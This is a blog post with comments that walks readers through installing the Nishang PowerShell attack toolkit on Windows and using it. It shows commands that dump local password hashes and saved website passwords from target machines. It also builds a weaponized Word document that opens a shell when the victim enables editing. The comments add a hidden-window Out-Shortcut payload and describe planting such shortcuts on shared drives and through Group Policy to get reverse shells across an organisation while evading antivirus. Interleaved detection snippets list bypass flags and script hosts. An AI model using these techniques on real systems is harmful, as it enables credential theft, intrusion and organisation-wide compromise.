
Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss!

As requested, this is the first post of many I’m doing on “hacking” and “pentesting.”  Many admins aren’t comfortable with Linux, or just want to use convenient Windows-based tools, so that’s what we’re going to do.  We’ll talk about a tool called Nishang, which you can use to do many different pentesting and security auditing techniques, using the Windows PowerShell 3.0.

To get started, you will need to download Nishang.  You can click here to go directly to the GitHub page or click the link below to download the latest version directly.  First, here's a video the creator of Nishang gave at DEF CON 21.


Download & Install


Click here to download the latest version of Nishang from GitHub.


Once you’ve downloaded the zip file, extract it, rename the folder to and put it in the root of your c: drive.




Open the Windows PowerShell command prompt as Administrator.  On Windows 10, click the start button and type “powershell” then right click and select “Run as Administrator.”


Quick Tip:  PowerShell 3.0 is installed by default on Windows 10. If you are running an older version of Windows, click here to find out how to download and install PowerShell 3.0.  If you have an older version of Windows, like Windows 7, you will need to do a Shift + Right-Click to get the option to Run as Administrator.


After you’re at the bright blue command prompt, navigate to the folder on the root of your c: drive.


cd ../..

cd .\\


Next, we will run a few commands to allow the Nishang PowerShell scripts to run.  Here is a brief rundown of what we're doing.

  • Set-ExecutionPolicy Unrestricted – Allows unsigned scripts to be executed (this changes the machine-wide LocalMachine scope, not just the current session)
  • Get-ChildItem -Path 'C:\\' -Recurse | Unblock-File – Removes the "downloaded from the Internet" mark (the Zone.Identifier stream) from every script in the folder and its subfolders so PowerShell will load them
  • Import-Module .\nishang.psm1 – Imports all of the Nishang scripts / modules for use in PowerShell


Note:  Select “A” for Yes to All when prompted, after setting the execution policy in the first command.

Set-ExecutionPolicy Unrestricted

Get-ChildItem -Path 'C:\\' -Recurse | Unblock-File

Import-Module .\nishang.psm1
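Because the first two commands change machine-wide state, it is worth seeing exactly what they touched. The following audit snippet is an added example, not code from the post or from Nishang; $ToolkitPath is a placeholder for the folder you extracted the zip into.

```powershell
# Added audit snippet, not part of the original post. $ToolkitPath is a
# placeholder; set it to the folder you extracted Nishang into.
$ToolkitPath = 'C:\nishang'

# 1. Execution policy is resolved per scope, top to bottom; the first scope
#    that is not Undefined wins. Set-ExecutionPolicy Unrestricted writes the
#    LocalMachine scope, so a Group Policy (MachinePolicy/UserPolicy) setting
#    still takes precedence, while a per-process -ExecutionPolicy switch sets
#    only the Process scope. Seeing all five scopes explains surprising behaviour.
Get-ExecutionPolicy -List | Format-Table -AutoSize

# 2. Files saved from a browser carry a Zone.Identifier alternate data stream
#    (ZoneId=3 means "Internet"); that stream is what Unblock-File deletes.
#    List any script under the toolkit folder that still carries it.
Get-ChildItem -Path $ToolkitPath -Recurse -Include *.ps1, *.psm1, *.psd1 |
    ForEach-Object {
        $zone = Get-Content -Path $_.FullName -Stream Zone.Identifier -ErrorAction SilentlyContinue
        if ($zone) {
            [pscustomobject]@{
                File   = $_.FullName
                ZoneId = (($zone | Where-Object { $_ -like 'ZoneId=*' }) -replace 'ZoneId=', '')
            }
        }
    } | Format-Table -AutoSize

# 3. When finished, restore the Windows client default rather than leaving the
#    machine-wide policy at Unrestricted (uncomment to run).
# Set-ExecutionPolicy -ExecutionPolicy Restricted -Scope LocalMachine -Force
```

An empty result from step 2 after running the Unblock-File command above is the expected outcome; any file still listed was not reached by the unblock and will be refused by the policy once it is tightened again.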


This is what it should look like in your window so far.




To see a list of all Nishang modules now available in PowerShell, use Get-Command.


Get-Command -Module nishang


There are quite a few, as you can see.  Click here to see an image of the output.


PS C:\> Get-Command -Module nishang

CommandType     Name                                Version    Source
-----------     ----                                -------    ------
Function        Add-Exfiltration                    0.0        nishang
Function        Add-Persistence                     0.0        nishang
Function        Add-RegBackdoor                     0.0        nishang
Function        Add-ScrnSaveBackdoor                0.0        nishang
Function        Base64ToString                      0.0        nishang
Function        Check-VM                            0.0        nishang
Function        Copy-VSS                            0.0        nishang
Function        Create-MultipleSessions             0.0        nishang
Function        DNS_TXT_Pwnage                      0.0        nishang
Function        Do-Exfiltration                     0.0        nishang
Function        Download                            0.0        nishang
Function        Download_Execute                    0.0        nishang
Function        Download-Execute-PS                 0.0        nishang
Function        Enable-DuplicateToken               0.0        nishang
Function        Execute-Command-MSSQL               0.0        nishang
Function        Execute-DNSTXT-Code                 0.0        nishang
Function        Execute-OnTime                      0.0        nishang
Function        ExetoText                           0.0        nishang
Function        FireBuster                          0.0        nishang
Function        FireListener                        0.0        nishang
Function        Get-Information                     0.0        nishang
Function        Get-LsaSecret                       0.0        nishang
Function        Get-PassHashes                      0.0        nishang
Function        Get-PassHints                       0.0        nishang
Function        Get-Unconstrained                   0.0        nishang
Function        Get-WebCredentials                  0.0        nishang
Function        Get-Wlan-Keys                       0.0        nishang
Function        Get-WmiShellOutput                  0.0        nishang
Function        Gupt-Backdoor                       0.0        nishang
Function        HTTP-Backdoor                       0.0        nishang
Function        Invoke-ADSBackdoor                  0.0        nishang
Function        Invoke-BruteForce                   0.0        nishang
Function        Invoke-CredentialsPhish             0.0        nishang
Function        Invoke-Decode                       0.0        nishang
Function        Invoke-Encode                       0.0        nishang
Function        Invoke-Interceptor                  0.0        nishang
Function        Invoke-JSRatRegsvr                  0.0        nishang
Function        Invoke-JSRatRundll                  0.0        nishang
Function        Invoke-Mimikatz                     0.0        nishang
Function        Invoke-MimikatzWDigestDowngrade     0.0        nishang
Function        Invoke-Mimikittenz                  0.0        nishang
Function        Invoke-NetworkRelay                 0.0        nishang
Function        Invoke-PortScan                     0.0        nishang
Function        Invoke-PoshRatHttp                  0.0        nishang
Function        Invoke-PoshRatHttps                 0.0        nishang
Function        Invoke-PowerShellIcmp               0.0        nishang
Function        Invoke-PowerShellTcp                0.0        nishang
Function        Invoke-PowerShellUdp                0.0        nishang
Function        Invoke-PowerShellWmi                0.0        nishang
Function        Invoke-Prasadhak                    0.0        nishang
Function        Invoke-PSGcat                       0.0        nishang
Function        Invoke-PsGcatAgent                  0.0        nishang
Function        Invoke-PsUACme                      0.0        nishang
Function        Out-CHM                             0.0        nishang
Function        Out-DnsTxt                          0.0        nishang
Function        Out-Excel                           0.0        nishang
Function        Out-HTA                             0.0        nishang
Function        Out-Java                            0.0        nishang
Function        Out-JS                              0.0        nishang
Function        Out-RundllCommand                   0.0        nishang
Function        Out-SCF                             0.0        nishang
Function        Out-SCT                             0.0        nishang
Function        Out-Shortcut                        0.0        nishang
Function        Out-WebQuery                        0.0        nishang
Function        Out-Word                            0.0        nishang
Function        Parse_Keys                          0.0        nishang
Function        Remove-Persistence                  0.0        nishang
Function        Remove-PoshRat                      0.0        nishang
Function        Remove-Update                       0.0        nishang
Function        Run-EXEonRemote                     0.0        nishang
Function        Show-TargetScreen                   0.0        nishang
Function        Speak                               0.0        nishang
Function        Start-CaptureServer                 0.0        nishang
Function        StringtoBase64                      0.0        nishang
Function        TexttoEXE                           0.0        nishang


Nishang Basics

An entire book could easily be written on the various modules included with Nishang.  You can run a script locally to get an idea of what it's capable of.  For instance, let's start with the Get-Information command.  From PowerShell, go ahead and run it.




As you can see, there is an incredible amount of information this module harvests for the attacker.  How much will be extracted from the target machine depends on the operating system and what patches have been installed.  Pen-Testing is an art and it requires a great deal of trial and error.


To get more specific information, such as password hashes, you can use the Get-PassHashes command.  This will dump all of the local account password hashes.  You can run it on your machine to get an idea of what it makes available.  When executed against a target machine it will provide their password hashes.




Here is a screenshot of this command being run against a Windows 10 workstation with the latest patches installed. The hashes are partially covered for obvious reasons.




Another very useful command is Get-WebCredentials.  When this is executed against a target it will dump any saved usernames and passwords used for websites.




Here is the output of Get-WebCredentials run against a target machine.  Identifiable information has been rendered useless, once again, for obvious reasons.




As you can see, one of the dumped passwords was from  That’s a pretty catastrophic security issue.  A majority of people have a bank account tied to their paypal account, and at least a credit card.  Not good!


Advanced Usage


Weaponized Word Document

With Nishang's Out-Word command, you can embed a payload in a weaponized Microsoft Word .doc file that is instructed to download and execute a PowerShell Meterpreter.  This is an example of a command to do precisely this. It will create a Word document called "Salary_Details.doc" with the payload embedded.


Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'




As soon as the target opens the Word document and clicks Enable Editing, the payload is delivered and you have owned their machine.




The attacker now has a command line dropped to the target's machine.  All from a single Word document.
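From the defender's side, the tell-tale of this delivery chain is an Office process starting a script host, usually with the same flags the Out-Word payload above passes to powershell.exe. The hunting snippet below is an added example, not code from the post or from Nishang; it assumes Sysmon is installed with process-creation logging (Event ID 1), and the parent-process list and flag list are constructed for this check.

```powershell
# Added detection example, not part of the original post. Assumes Sysmon is
# installed and logging process creation (Event ID 1). The Office parent names
# and the PowerShell flag list are constructed for this check.
$OfficeParents   = 'WINWORD.EXE', 'EXCEL.EXE', 'POWERPNT.EXE', 'OUTLOOK.EXE'
$ScriptHosts     = '^(POWERSHELL|PWSH|CMD|WSCRIPT|CSCRIPT|MSHTA|RUNDLL32)\.EXE$'
$SuspiciousFlags = '-ExecutionPolicy Bypass', '-ep bypass', '-nop', '-noprofile',
                   '-WindowStyle hidden', '-w hidden', '-EncodedCommand', '-enc '

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Sysmon/Operational'
    Id        = 1
    StartTime = (Get-Date).AddDays(-7)
} -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Sysmon writes each field as <Data Name="...">; flatten them into a table.
    $data = @{}
    foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    $parent = [IO.Path]::GetFileName([string]$data['ParentImage']).ToUpper()
    $child  = [IO.Path]::GetFileName([string]$data['Image']).ToUpper()
    $cmd    = [string]$data['CommandLine']

    # Rule A: any script host whose parent is an Office application.
    $officeSpawn = ($OfficeParents -contains $parent) -and ($child -match $ScriptHosts)
    # Rule B: PowerShell started with the flags the Out-Word payload uses.
    $flagHits = @($SuspiciousFlags | Where-Object { $cmd -match [regex]::Escape($_) })
    $flagged  = ($child -match '^(POWERSHELL|PWSH)\.EXE$') -and ($flagHits.Count -gt 0)

    if ($officeSpawn -or $flagged) {
        $reason = if ($officeSpawn) { "spawned by $parent" } else { "flags: $($flagHits -join ', ')" }
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Host    = $e.MachineName
            User    = $data['User']
            Parent  = $parent
            Process = $child
            Reason  = $reason
            Command = $cmd
        }
    }
}
```

Rule A fires regardless of how the payload is obfuscated, because it keys on the parent/child relationship rather than the command text; Rule B catches the same flags when PowerShell is launched from a shortcut or script instead of Word.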


Nishang Help Files


Every command included with Nishang includes a PowerShell help file.  This is incredibly useful.  I suggest running the help command against every included command as there is a wealth of useful information.  Included is a description, synopsis, available parameters, syntax, notes, and website links with additional information.

To get help with a particular command, use the Get-Help command.  In this example, we will read the help file on the Invoke-Mimikatz command.


Get-Help Invoke-Mimikatz


As you can see, there is quite a bit of useful information provided.


PS C:\> Get-Help Invoke-Mimikatz -full

Do you want to run Update-Help?
The Update-Help cmdlet downloads the most current Help files for Windows PowerShell modules, and installs them on your
computer. For more information about the Update-Help cmdlet, see
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"):

NAME
    Invoke-Mimikatz

SYNOPSIS
    This script loads Mimikatz completely in memory.

SYNTAX
    Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCreds]] [<CommonParameters>]

    Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCerts]] [<CommonParameters>]

    Invoke-Mimikatz [[-ComputerName] <String[]>] [[-Command] <String>] [<CommonParameters>]

DESCRIPTION
    This script leverages Mimikatz 2.1 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in
    memory. This allows you to do things such as dump credentials without ever writing the mimikatz binary to disk.
    The script has a ComputerName parameter which allows it to be executed against multiple computers.

    This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell
    v2 or higher installed.

    Reflectively loads Mimikatz 2.1 in memory using PowerShell. Can be used to dump credentials without writing
    anything to disk. Can be used for any functionality provided with Mimikatz.

    The script, in near future, will provide additional commands for a variety of attacks possible with Mimikatz.

    Function: Invoke-Mimikatz
    Author: Joe Bialek, Twitter: @JosephBialek
    Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: Email: [email protected]
    Twitter @gentilkiwi
    Required Dependencies: Mimikatz (included)
    Optional Dependencies: None
    Mimikatz version: 2.1 alpha (17/02/2016)

PARAMETERS
    -ComputerName <String[]>
        Optional, an array of computernames to run the script on.

        Required?                    false
        Position?                    1
        Default value
        Accept pipeline input?       false
        Accept wildcard characters?  false

    -DumpCreds [<SwitchParameter>]
        Switch: Use mimikatz to dump credentials out of LSASS.





If you get Permission Denied errors when attempting to install Nishang scripts, then you have not opened an "Administrative" PowerShell command prompt.  This is done by right-clicking the PowerShell shortcut and selecting "Run as Administrator."  On some older versions of Windows, such as Windows 7, you have to hold down Shift + Right click to get the option to run as administrator.




This guide has taken you through the process of installing Nishang's PowerShell module and has provided you with some examples of how to use a few of the available tools.  There are countless ways this toolkit can be used and this is really just the tip of the iceberg.  I will be publishing additional resources to help guide you through using some more available tools in a more in-depth manner.  But for now, play around with the available commands and see what's possible.  I have included some links with additional resources below.  I implore you to check them out and use Google to find usage examples others have provided.  I hope you've found this guide helpful and if you have any questions, please feel free to post in the comments below!


Additional Resources


Nishang Toolkit Homepage – High level overview of modules


Nikhil SamratAshok Mittal’s Blog (Author of Nishang, hundreds of examples)


5 thoughts on "Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss!"

  1. Danny says:

    Really cool stuff. Another example reason to lock down execution policy across the board via GPO, not just on servers. Wonder what Out-SCF and Out-SCT do.

    • Mike Smith says:

      Out-SCT is a script used to create a .COM (like a .com component file, as in component object model run by Windows Scripting Host) file capable of executing PowerShell commands and scripts.

      Out-SCF creates an SCF file (like a Windows Explorer command, sort of like an autorun.ini) that can be used for capturing NTLM hash challenges.

    • Mike Smith says:

      Oh yeah, and there are switches you can throw into many of these commands that completely bypass any execution policy settings.

      For instance, you can create a weaponized Microsoft Word file like I described in the post, and use the "-ExecutionPolicy Bypass" and just bypass execution policy altogether.

      If you want to make it look even more legit, you could create a weaponized shortcut file to place on their start menu's recently accessed applications, or replace the default shortcut, pointing to a Microsoft Office app, like MS Word or MS Excel, with the same type of payload, and configure it to still load the target program so they are clueless. They would just be opening Microsoft Word from their recently accessed applications list in the start menu. As long as you generated a unique hash to create your payloads no AV will catch it. Here is an example command that should work:

      PS > Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem"

      This is some seriously wicked stuff 🙂

      • Mike Smith says:

        And you could take it even one step further and find a network share they can write to. Many network shares contain shortcuts to other shared network folders for convenience. Replace one of those shortcuts with one that has a payload, then every person in their department, and very likely IT, creates a reverse shell back to the attacker every time they use the shortcut, and on every computer or server they use it on. It will never be caught by an antivirus application unless it's somehow discovered (very unlikely) and submitted to VirusTotal or something along those lines, which is also unlikely to happen.


        • Mike Smith says:

          Once you get access to one server or the credentials of one person with access to AD, bury a shortcut replacement GPO in one of their existing policies to deploy a shortcut for Chrome or IE or some other program used by everyone multiple times a day, and within a few minutes of a Monday morning you have shells to every computer in their entire infrastructure… MUHHUIAHAHA
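The shortcut replacement discussed in the comments above leaves a durable artifact: a .lnk whose target or arguments point at a script host with hiding or bypass flags. The snippet below is an added example, not code from the post, its commenters or Nishang; it reads shortcuts with the WScript.Shell COM object without launching them, and $SearchPaths is a constructed placeholder list to replace with the shares and Start menu folders you actually want to review.

```powershell
# Added hunting snippet, not part of the original post or its comments. Reads
# .lnk files without running them and reports any whose target or arguments
# look like a scripted payload. $SearchPaths is a constructed placeholder list.
$SearchPaths = @(
    '\\fileserver\dept$',                              # a shared folder to review
    "$env:ProgramData\Microsoft\Windows\Start Menu",   # all-users Start menu
    "$env:APPDATA\Microsoft\Windows\Recent"            # current user's Recent items
)
$HostPattern = '^(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe$'
$FlagPattern = '-(ExecutionPolicy\s+Bypass|ep\s+bypass|nop\b|noprofile|w\s+hidden|WindowStyle\s+hidden|enc\b|EncodedCommand)'

$shell = New-Object -ComObject WScript.Shell
Get-ChildItem -Path $SearchPaths -Recurse -Filter *.lnk -ErrorAction SilentlyContinue |
    ForEach-Object {
        $lnk       = $shell.CreateShortcut($_.FullName)   # parses the .lnk, does not launch it
        $target    = [IO.Path]::GetFileName([string]$lnk.TargetPath)
        $arguments = [string]$lnk.Arguments
        $findings  = @()

        if ($target -match $HostPattern)    { $findings += "target is $target" }
        if ($arguments -match $FlagPattern) { $findings += 'script-host flags in arguments' }
        if ($lnk.WindowStyle -eq 7)         { $findings += 'window style is Minimized' }   # 7 = minimized, 1 = normal

        if ($findings.Count -gt 0) {
            [pscustomobject]@{
                Shortcut  = $_.FullName
                Target    = $lnk.TargetPath
                Arguments = $arguments
                Modified  = $_.LastWriteTime
                Findings  = $findings -join '; '
            }
        }
    } | Sort-Object Modified -Descending | Format-Table -AutoSize -Wrap
```

A legitimate Office or browser shortcut has an .exe target with empty or harmless arguments, so any hit with a script-host target and bypass flags on a shared folder warrants a look at who last modified it and when.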

